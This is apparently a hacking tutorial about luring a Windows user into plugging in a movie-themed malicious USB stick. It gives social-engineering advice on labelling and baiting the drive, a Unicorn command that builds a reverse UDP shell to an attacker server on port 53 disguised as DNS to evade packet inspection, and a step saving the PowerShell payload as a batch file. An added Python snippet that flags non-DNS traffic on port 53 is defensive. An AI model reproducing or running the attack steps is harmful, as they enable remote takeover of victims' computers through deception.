The newest Star Wars movie, Solo: A Star Wars Story, recorded almost $350 million in its first month in theaters worldwide. This is a great opportunity to discuss how hackers can use media hype (Hollywood movie hype in this case) to get an unsuspecting Windows user to put a nasty USB stick into their computer.
A long time ago, in a galaxy far, far away… a study was carried out in which 300 malicious USB sticks were dropped by researchers on a university campus in Illinois. Almost 50% of the USB sticks were picked up, and at least one file was opened on each of them.
The data showed that attaching keys to the USB stick's keyring increased the likelihood that the flash drive was inserted into a computer. The presence of keys undoubtedly reinforced the belief that the keys and the USB stick had been lost rather than placed on the ground by a hacker. The data also suggest that USB sticks labeled "Pictures" or "Winter Break Pictures" are more likely to be inserted by the finder. Keys and labels should therefore be taken into account for USB drops.
The researchers' experiment targeted students and professors, relying on their willingness to believe that a student could have lost a USB stick on campus. But what if the target is not at a university?
This type of attack does not have to use the Star Wars franchise as its theme; I'm just a big fan of the movies. During a reconnaissance phase, it might be discovered that a target user is obsessed with zombie movies and TV series. In that case, loading the USB flash drive with content inspired by The Walking Dead, or by a celebrated horror movie filmmaker, would make more sense. The point is to label the USB flash drive and fill it with content that the intended victim will find hard to ignore. Make it tempting and exciting.
After cloning Unicorn, go to the unicorn/ directory and run the following command:
python unicorn.py windows/shell/reverse_udp 126.96.36.199 53
This payload creates a reverse UDP connection (reverse_udp) to the attacker's VPS IP address (188.8.131.52) on port 53. UDP on port 53 is used to further disguise the payload and its network activity: anyone examining the traffic to and from the compromised Windows computer could mistake the packets for normal DNS activity. This does not make the malicious packets impossible to discover, but it can help evade Deep Packet Inspection (DPI).
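The claim above is exactly what a DPI check tests for, so here is an added example (not part of the original tutorial) of the minimal inspection a defender can run on UDP/53 traffic: parse each payload as a DNS message and flag anything that does not conform. The sample packets, including the shell-banner payload, are constructed for the example.

```python
import struct

def looks_like_dns(payload: bytes) -> bool:
    """Return True if the UDP payload parses as a well-formed DNS message.

    Checks: a 12-byte header is present, the opcode is a defined value, and
    every question-section entry is a valid label sequence plus QTYPE/QCLASS.
    """
    if len(payload) < 12:
        return False
    _id, flags, qdcount, ancount, nscount, arcount = struct.unpack("!6H", payload[:12])
    opcode = (flags >> 11) & 0xF
    if opcode not in (0, 1, 2, 4, 5):      # QUERY, IQUERY, STATUS, NOTIFY, UPDATE
        return False
    if qdcount == 0 and ancount == nscount == arcount == 0:
        return False                       # an empty message carries no DNS semantics
    pos = 12
    for _ in range(qdcount):
        while True:                        # walk the QNAME labels
            if pos >= len(payload):
                return False
            length = payload[pos]
            pos += 1
            if length == 0:
                break
            if length & 0xC0:              # compression pointers are not valid in a question
                return False
            if length > 63 or pos + length > len(payload):
                return False
            pos += length
        if pos + 4 > len(payload):         # QTYPE and QCLASS must follow
            return False
        pos += 4
    return True

def flag_non_dns_on_53(packets):
    """Return indices of UDP/53 packets whose payload does not parse as DNS."""
    return [i for i, (port, payload) in enumerate(packets)
            if port == 53 and not looks_like_dns(payload)]

# Constructed sample traffic: (destination UDP port, payload).
LEGIT_QUERY = (b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"   # header: RD set, 1 question
               + b"\x07example\x03com\x00\x00\x01\x00\x01")          # example.com, A, IN
SAMPLE_PACKETS = [
    (53, LEGIT_QUERY),
    (53, b"Microsoft Windows [Version 10.0]\r\nC:\\Users\\victim>"),  # shell output over UDP/53
    (53, b""),                                                        # too short to be DNS
    (123, b"\x1b" + b"\x00" * 47),                                    # NTP on another port; ignored
]

if __name__ == "__main__":
    print(flag_non_dns_on_53(SAMPLE_PACKETS))  # -> [1, 2]
```

Port-based filtering alone would pass all three UDP/53 packets; the structural check is what separates them, which is why the text only claims the disguise helps and does not make discovery impossible.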
Step 4: Save the Payload
Then open the newly created powershell_attack.txt file in the unicorn/ directory. Select the entire PowerShell command and save it on a Windows 10 computer with the filename payload.bat.